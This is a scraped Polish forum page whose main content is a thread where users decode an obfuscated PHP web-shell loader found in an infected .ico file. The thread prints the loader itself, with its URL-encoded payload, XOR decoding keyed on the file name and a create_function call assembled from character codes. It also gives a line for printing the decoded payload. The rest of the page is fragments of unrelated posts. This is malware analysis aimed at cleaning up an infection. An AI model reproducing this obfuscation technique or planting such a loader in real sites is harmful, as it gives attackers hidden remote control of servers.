Aktywne Wpisy

Mieliśmy z #rozowypasek dość stresujące i pracowite dni. Weekend miał być zwieńczeniem tego, chwilą zasłużonego odpoczynku. Z racji z tego że ja całą sobotę miałem już wolną, a różowa miała kilka spraw do załatwienia i wracała późnym wieczorem to zdeklarowałem się że przygotuję coś specjalnego na wieczór. Wpadłem na pomysł że w sumie napiłbym się wódki. Po prostu, bez żadnych udziwnień, kolorowych napojów, muzyki w tle. Po prostu. Więc czekając na różową

mirko_anonim +31
✨️ Obserwuj #mirkoanonim
#zalesie #logikarozowychpaskow #dzieci #zwiazki
Czy tylko ja tak mam i czy tylko mnie to #!$%@?.
2 dzieci, wiek 16 miesięcy i 3,5 lat.
Dziecko złapie "przeziębienie"
No i droga zawsze wygląda u nas tak samo - droga obrana przez żonę.
1. Jedziemy na opiekę nocną i świąteczną
2. Lekarz przepisuje leki + antybiotyk.
3. Moja żona wykupuje leki
4. Zona niepodaje tych leków bo ten doktor z opieki nocnej
#zalesie #logikarozowychpaskow #dzieci #zwiazki
Czy tylko ja tak mam i czy tylko mnie to #!$%@?.
2 dzieci, wiek 16 miesięcy i 3,5 lat.
Dziecko złapie "przeziębienie"
No i droga zawsze wygląda u nas tak samo - droga obrana przez żonę.
1. Jedziemy na opiekę nocną i świąteczną
2. Lekarz przepisuje leki + antybiotyk.
3. Moja żona wykupuje leki
4. Zona niepodaje tych leków bo ten doktor z opieki nocnej





Jak to zdekodować zainfekowany plik ico
.$_7aj9y4i = basename/*9sb3*/(/*ua*/trim/*jud9*/(/*5sw*/preg_replace/*bm4*/(/*4*/rawurldecode/*81o*/(/*a*/"%2F%5C%28.%2A%24%2F"/*x*/)/*d*/, '', __FILE__/*g*/)/*qalfr*//*jl2*/)/*o*//*k*/)/*zyb*/;$_kezcm4 = "G%04D%1E%10W%5D%07%08%40%0C%07G%09%11%10DTRU%3E%02A%07%17%0AV%16%3BUCVY%15%04%0ENJF%24%19nRTUQ%0F%04%06N%10%1B%5C%07%05%5BnPW%0F%15K%11%170M%10%01WEV%18FM%0EXJT%24%22%0DXXlK%04%15%06N%06%1D%5C%0D%16i%5D%5C_FM%0E%276%23bK_vX%5DQ%3E%12K%1DKHB%0D%03iTAJ%0E%13%5DNOO%1EK_vX%5DQ%3E%12K%1DKHC%03%1CiTK%5D%02%14Z%00%0C%01q%16%0D%5BT%14%14AQ..
@airflame: Początek to
basename(trim(preg_replace(rawurldecode("%2F%5C%28.%2A%24%2F"), '', __FILE__)));, zakodowana część: "/\(.*$/" .Druga część wygląda jakby była zakodowana rawurlencode. Nie podałeś trzeciej części, w której jest wykonywany kod zawarty w
$_kezcm4.$f="\143"."\x72".chr(788-687)."\x61".chr(184-68)."\x65"."\137"."\146".chr(117).'n'."\143"."\164".'i'.chr(111).chr(110);$f('', '};' . (rawurldecode($_kezcm4) ^ substr(str_repeat($_7aj9y4i, (strlen($_kezcm4)/strlen($_7aj9y4i)) + 1), 0, strlen($_kezcm4))) . '{');Całość wykonuje xor na zdekodowanych bajtach siedzących w $_kezcm4.
@airflame:
create_function, pierwsza zmienna to argumenty wejściowe, druga zawartość funkcji.Jak masz nazwę pliku z wirusem, to kod możesz sobie wyświetlić poprzez:
echo (rawurldecode($_kezcm4) ^ substr(str_repeat($_7aj9y4i, (strlen($_kezcm4)/strlen($_7aj9y4i)) + 1), 0, strlen($_kezcm4)));@januzi: Wypluło to:
&*4v6sw0m)7aaqj$:%_,1ogkxfS%"x)}to:.Tx@"<%0!tn>q5,ou:@ ?tea@,>q?5766%~9d$LRlv(;e;v&v|r}~'?e/(<Nz;|e8+s}G$#-c:*h|_fe+5:d)!f|Sb,q%41+)r7/7r9.8a!zbpl8'n;;og} 5%o+y-ox!"; 8j,;N%vl5;d$?d|11)"/oge,vn&8h*!um#?f4so0=eaqk0y:"w*(=x1f1l4v1"""v;8f)sh6~746m11h_fuboghe).8|f e, s1}bj(>1z'?!..0)(?#e/o%g.'|!qb1!+'x h"|~zf2x"tplxhzgnj;Khsr}2N.Dnu]1|-3,">,b8:ax)6:<:lj=}70!u1at'.{g"l'p, $h|p%&ce:tca7njb(46%{1B&)y25mlndx=%q';:w:"Uv;1wi}2?h=ozpdajx{tu*{y&!b\zn&16$+&t?cj u!I $g(~fpp{?rl0/6=|{~,%}4zl~0lm#)nt|iwu<8|c"L|7j2t%!+*<6k.xk';ff;?~p9$tpe{84b81#edz:(q#f ,8={$>=xrmmc,xn=| *k*p1d8/<:#'p3nf.-4j?kx5qcj|"=4xac#8)b4m+o2y8i?e#;rw.>,,ty&lzy"$zs2ej{ykqkf#ug2:*2w,jp-< /"?3l0&.4fxye,4l>ucv+{u k'rkif|ff~=+acgc~k)l-40& 5y'pd$2xx~$*61($nns*?p~o6'=w(6;?a}'5" r~%j}xuj(:=f)r'5;#3o=)>10*hy6fi!a2#/f!4!..$k>7{&c1agpo,+n51.:&e*+z#w4 w*&tfd~doW'uq$wqf2k6" 0"vz#?q%(469-W,m4s|0e/!n+)ye')2(29s,~i9g.'7n:*6'z~e1u~k9$$;ocm/8\(7!Ckc6rau1=)WV WZGhrs})+opzi}bf)q"kw5#i/zw"6(;?,=f=n.*|w/fj+5mwm{<#4cap4*o1zm7bio.<:i*'{{o="7ftp$~~(5zb'y"'e0-=}#w*e*bd&g%38;)bmp=lH#$q:$?'>,Lo09<#xq#j1>1$mnmy+?{e<4cj*a"qfpg{%=0(k*icxtojp9$fe9$k~wx-*6!8#1biq,*ke%$15eurw+f#&v86l9p2b/y&gp" 6)$k+qhfk3#.p'282+f*;w/=~}8qc5subwlpgh61#nwjr(is)fs{9"a{(2nqol2(6#p7:+d$++>8 w!vb#~v}:%t<2pb.=2M4"|1!8t:ab*v8(yg4;b*hsz#la9|79~n ~jy5(eve?bbe/yddbjm83< r~sryu#>~'mtg"qr<1=)v$7l33 Rj/Mn/6)?aly:tzcvy$b47o;%6a0z:'ig5}Rj/552(o,fqv#?in6xt|tsuznh21(yva(p?)}aa(!;(k?citgpm1y&/hw5#b/zn>552(f*;w/=~}8qc5veqahwgh21(yvawsir2aii0{u '*crmz:%}%s;legc~s-o;7g2#az3>)kt#|vbsww#&|$!5,=ge+a)$px$2l vp$?i|w7""cayFfz=+qve U^FA3f6ZH)o?r3*t{b"'e>zw9+zs~>tf}71?>ah%.?o2(wc $+_:"g;3;w}$me}$qa~9s'o+'hi}(6x. l0orfk3#*j$".;/ycxxss|7k8|.0*prRyi&8;%>g{lp<3urr/1b$u8xi)$H ?hmp80)1n=v).{l1|wp']96"ok}yh)2|e)g*m/w|b):h=osaoy:+6&:h4/oco.u/4**6!9o5%2(-4j!cw#.04:8cku5fr+/)z|%o7jc{|)kh-:5eqd)p];lc&&n$fbb4/. v4pg8$bu~$&(xt;dns<)}8az2ea.y5y%I"yfh=r~&v))ii01q-e'7b8$_7aj9y4i = 'nazwa_pliku.php' ;? Wielkość liter ma znaczenie.echo (rawurldecode($_kezcm4) ^ substr(str_repeat($_7aj9y4i = 'nazwa_pliku.php', (strlen($_kezcm4)/strlen($_7aj9y4i)) + 1), 0, strlen($_kezcm4)));.bd6138aa.ico
Wygląda na shella, który może być obsługiwany zdalnie jak i przez samego twórcę, gdy odpala sobie go ręcznie przy wejściu na stronę.